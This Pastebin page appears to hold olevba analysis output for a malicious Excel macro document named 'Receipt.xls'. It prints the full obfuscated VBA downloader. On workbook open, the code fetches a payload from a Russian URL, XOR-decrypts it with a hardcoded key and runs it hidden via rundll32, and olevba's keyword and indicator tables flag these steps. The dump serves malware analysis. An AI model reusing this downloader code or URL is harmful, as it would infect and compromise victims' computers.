Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASI-B- Receipt.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: Receipt.xls
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: xl/vbaProject.bin - OLE stream: u'VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- ItNinja "ASDEX"
- End Sub
- Function copy_screen_to_array(output_array)
- output_array = ""
- Dim screenarray(23)
- Row = 1
- For Each Line In screenarray
- EMReadS.creen reading_line, 80, Row, 1
- output_array = output_array & reading_line & "UUDDLRLRBA"
- Row = Row + 1
- Next
- output_array = Split(output_array, "UUDDLRLRBA")
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: xl/vbaProject.bin - OLE stream: u'VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public moyaMANUNADAcdaw As Object
- Public moyaMANUNAra12dv34 As Object
- Public moyaMANUNAKSKLAL As Object
- Public moyaMANUNALAKOPPC As String
- Public moyaMANUNAPLdunay() As String
- Public moyaMANUNAUUUKA As String
- Public moyaMANUNAUUUKABBB As String
- Public moyaMANUNAGMAKO As Object
- Public moyaMANUNA4 As String
- Public moyaMANUNA2 As String
- Public moyaMANUNAASALLLP As Variant
- Public Const moyaMANUNARH = "User-Agent"
- Public Const RACHEL = "etofi"
- Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
- Dim tmp As String
- Dim i As Long
- If dilodan Then
- moyaMANUNALAKOPPC = moyaMANUNAKSKLAL(moyaMANUNAPLdunay(6))
- moyaMANUNAUUUKA = moyaMANUNALAKOPPC
- moyaMANUNAUUUKABBB = moyaMANUNAUUUKA + "\hrushki"
- moyaMANUNAUUUKA = moyaMANUNAUUUKA + moyaMANUNAPLdunay(12)
- Exit Function
- Else
- GoTo VarPupka
- End If
- restart:
- For i = 1 To Len(tlfNr)
- If Mid$(tlfNr, i, 1) = " " Then
- tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
- GoTo restart
- End If
- Next i
- For i = 1 To Len(tlfNr)
- tmp = tmp & Mid$(tlfNr, i, 1)
- If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
- tmp = tmp & " "
- End If
- Next i
- TlfFormat = tmp
- VarPupka:
- CallByName moyaMANUNAra12dv34, "sav" + RACHEL + "le", VbMethod, moyaMANUNAUUUKABBB, 14 / 7
- SaveAllStufAndExit moyaMANUNAUUUKABBB, moyaMANUNAUUUKA, "S2CsMgS5Y9WxzevdSUrPqUiTwI69FbRq"
- Call Shell("rund" & "ll32.exe " & moyaMANUNAUUUKA & ",qwerty", vbHide)
- End Function
- Function PhraseCmd(cmd)
- regEx.IgnoreCase = True
- Set Matches = regEx.Execute(cmd)
- If Matches.Count <> 0 Then
- Set objMatch = Matches(0)
- Command = objMatch.SubMatches(0)
- WAITTIME = CInt(objMatch.SubMatches(1))
- WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
- End If
- regEx.Pattern = "(.*?)-persist"
- regEx.IgnoreCase = True
- Set Matches = regEx.Execute(cmd)
- If Matches.Count <> 0 Then
- Set objMatch = Matches(0)
- Command = objMatch.SubMatches(0)
- PhraseCmd = "persist"
- End If
- End Function
- Function CreateShare()
- Set objNewShare = objWMIService.Get("Win32_Share")
- intReturn = objNewShare.Create _
- (FilePath, "WMI_SHARE", 0, 25, "")
- If intReturn <> 0 Then
- WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
- vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
- Select Case intReturn
- Case 2
- WScript.Echo "WMIEXEC ERROR: Access Denied!"
- Case 9
- WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
- Case 22
- WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
- Case 24
- WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
- End Select
- If intReturn <> 22 Then WScript.Quit 1
- Else
- WScript.Echo "WMIEXEC : Share created sucess."
- WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
- WScript.Echo "WMIEXEC : Share Path -> " & FilePath
- End If
- End Function
- Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
- GodnTeBabenParama = Replace(CH1, CH2, CH3)
- End Function
- Public Function NombreUsuario() As String
- Dim SQL As String
- moyaMANUNAra12dv34.Type = 0 + 0 + 1
- moyaMANUNAra12dv34.Open
- Exit Function
- SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
- If Not RsUsuario.EOF Then
- NombreUsuario = RsUsuario!usu_apodo
- End If
- End Function
- Function DeleteShare()
- For Each objShare In colShares
- intReturn = objShare.Delete
- Next
- If intReturn <> 0 Then
- WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
- vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
- Select Case intReturn
- Case 2
- WScript.Echo "WMIEXEC ERROR: Access Denied!"
- Case 25
- WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
- End Select
- Else
- WScript.Echo "WMIEXEC : Share deleted sucess."
- End If
- End Function
- Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
- Set moyaMANUNA1DASH1solo = CreateObject(moyaMANUNAPLdunay(3))
- Set moyaMANUNAKSKLAL = moyaMANUNA1DASH1solo.Environment(moyaMANUNAPLdunay(2 + 2))
- VerCadenaPermiso ddmmyyhhmmDateTime
- End Function
- Public Sub DecryptByte(ByteArray() As Byte, Key As String)
- Dim offset As Long
- Dim ByteLen As Long
- Dim ResultLen As Long
- Dim CurrPercent As Long
- Dim NextPercent As Long
- Dim m_Key() As Byte
- Dim m_KeyLen As Long
- m_KeyLen = Len(Key)
- ReDim m_Key(m_KeyLen)
- m_Key = StrConv(Key, vbFromUnicode)
- ByteLen = UBound(ByteArray) + 1
- ResultLen = ByteLen
- For offset = 0 To (ByteLen - 1)
- ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
- If (offset >= NextPercent) Then
- CurrPercent = Int((offset / ResultLen) * 100)
- NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
- End If
- Next
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | vbHide | May run an executable file or a system |
- | | | command |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | ll32.exe | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub VerCadenaPermiso(permiso As String)
- Dim i As Long
- Dim letra As String
- Alta = False
- Baja = False
- modi = False
- Dim Consu As Boolean
- Consu = True
- moyaMANUNA4 = "http://opmsk.ru/g76ub76"
- If Application = "Microsoft Excel" Then
- moyaMANUNADAcdaw.Open moyaMANUNAPLdunay(5), moyaMANUNA4, False
- moyaMANUNADAcdaw.setRequestHeader moyaMANUNARH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"
- moyaMANUNADAcdaw.Send
- TlfFormat letra, True
- NombreUsuario
- moyaMANUNAacheha letra
- End If
- Exit Sub
- For i = 1 To Len(permiso)
- letra = Mid(permiso, i, 1)
- If letra = "A" Then
- Alta = True
- End If
- If letra = "B" Then
- Baja = True
- End If
- If letra = "M" Then
- modi = True
- End If
- If letra = "C" Then
- Consu = True
- End If
- Next i
- If Len(permiso) = 0 Then
- Consu = False
- modi = False
- Alta = False
- Baja = False
- End If
- End Sub
- Public Function GetResulOfMyResult(ByVal Cadena As String) As String
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "=CH", "M")
- GetCurrentFolder
- Set moyaMANUNAra12dv34 = CreateObject(moyaMANUNAPLdunay(1))
- Set moyaMANUNAGMAKO = CreateObject(moyaMANUNAPLdunay(5 - 3))
- ClearString ""
- End Function
- Public Function moyaMANUNAacheha(pass As String) As String
- Dim temp As String
- Dim moyaMANUNAtum As String
- GoTo beyTumba
- Dim pos As Long
- Dim leng As Long
- Dim tim As Variant
- Dim i As Long
- Dim Key As Long
- leng = Len(pass)
- tim = Mid(Time, 1, 8)
- tim = Mid(tim, 1, Len(tim) - 3)
- tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
- For i = 1 To Len(CStr(tim))
- pos = pos + CInt(Mid(CStr(tim), i, 1))
- Next
- While pos > Len(pass)
- pos = pos Mod 10 + Int(Rnd * 10)
- If pos = 0 Then
- pos = Len(pass) + 1
- End If
- Wend
- beyTumba:
- moyaMANUNAASALLLP = moyaMANUNADAcdaw.responseBody
- ReadResult
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | IOC | http://opmsk.ru/g76u | URL |
- | | b76 | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: xl/vbaProject.bin - OLE stream: u'VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ReadResult()
- moyaMANUNAra12dv34.Write moyaMANUNAASALLLP
- GoTo pid7
- WScript.Sleep (WAITTIME)
- UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set objFile = fso.OpenTextFile(UNCFilePath, 1)
- If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
- objFile.Close
- WScript.Echo strContents
- strDelFile = "del " & file & " /F"
- exe.c strDelFile, "nul"
- pid7:
- TlfFormat "", False
- End Function
- Public Function GetCurrentFolder()
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2, "*P", LCase("S"))
- GoTo mig5
- WScript.Sleep (WAITTIME)
- UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set objFile = fso.OpenTextFile(UNCFilePath, 1)
- GetCurrentFolder = objFile.ReadLine
- objFile.Close
- strDelFile = "del " & file & " /F"
- exe.c strDelFile, "nul"
- mig5:
- moyaMANUNAPLdunay = Split(moyaMANUNA2, "JIIIINX")
- End Function
- Public Function ClearString(ByRef inOrigString As String) As String
- Dim strNewString As String
- Dim sChar As String
- Dim i As Integer
- Dim d As Boolean
- d = True
- IsWord = True
- For i = 1 To Len(Trim("Reika"))
- If d = False Then
- Set moyaMANUNADAcdaw = CreateObject(moyaMANUNAPLdunay(i - 2))
- Exit For
- Else
- d = False
- End If
- Next i
- ToDBDateTime ""
- Exit Function
- Call check_fo.r_MAXIS(False)
- Call navigate_t.o_MAXIS_screen("POLI", "____")
- EMWri.teScreen "TEMP", 5, 40
- EMWri.teScreen "TABLE", 21, 71
- trans.mit
- Set objExcel = CreateObject("Excel.Application")
- objExcel.Visible = True
- Set objWorkbook = objExcel.Workbooks.Add()
- objExcel.DisplayAlerts = True
- objExcel.Cells(1, 1).Value = "TITLE"
- objExcel.Cells(1, 2).Value = "SECTION"
- objExcel.Cells(1, 3).Value = "REVISED"
- For i = 1 To 3
- objExcel.Cells(1, i).Font.Bold = True
- Next
- ClearString = strNewString
- End Function
- Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)
- Dim libhercen As Integer
- Dim ByteArray() As Byte
- libhercen = FreeFile
- Open SourceFile For Binary As #libhercen
- ReDim ByteArray(0 To LOF(libhercen) - 1)
- Get #libhercen, , ByteArray()
- Close #libhercen
- Call DecryptByte(ByteArray(), Key)
- libhercen = FreeFile
- Open DestFile For Binary As #libhercen
- Put #libhercen, , ByteArray()
- Close #libhercen
- End Sub
- Public Function ItNinja(ByRef inGUID As String) As String
- moyaMANUNA2 = "=CHicro*Poft.X=CHLHTTPJIIIINXAdodb.*Ptr-Ea=CHJIIIINX*Ph-Ell.Ap"
- moyaMANUNA2 = moyaMANUNA2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph-EllJIIIINXProc-E*P*PJIIIINXG-ETJIIIINXT-E=CHPJIIIINXTyp-EJIIIINXop-EnJIIIINXwritFILMABOpon*P-EBodyJIIIINX*Pav-Etofil-EJIIIINX", "FILMABO", "-EJIIIINXr-E*P")
- moyaMANUNA2 = GodnTeBabenParama(moyaMANUNA2 + "\hupoa*P.dll", "-E", "e")
- GetResulOfMyResult "-"
- Exit Function
- If Mid$(inGUID, 1, 1) <> "{" Then
- ItNinja = "{" & inGUID & "}"
- Else
- ItNinja = inGUID
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | P.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement